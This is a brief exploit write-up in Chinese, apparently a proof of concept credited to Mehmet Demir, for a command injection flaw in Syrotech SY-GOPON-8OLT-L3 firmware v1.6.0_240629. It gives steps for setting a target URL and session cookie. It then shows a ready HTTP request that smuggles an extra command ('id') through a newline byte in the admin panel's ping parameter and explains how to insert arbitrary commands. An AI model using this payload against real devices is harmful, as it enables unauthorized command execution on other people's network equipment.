Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 命令注入漏洞
1- 编辑脚本中的 URL。
2- 编辑脚本中的 Cookie_Login 值。
3- 运行脚本,它将允许你执行命令。
GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1
正常情况下,管理面板中只允许执行 ping 命令。
如果你通过代理拦截请求,在命令参数末尾添加一个换行字节并输入你想要运行的命令,它将允许你运行另一个命令。
Mehmet Demir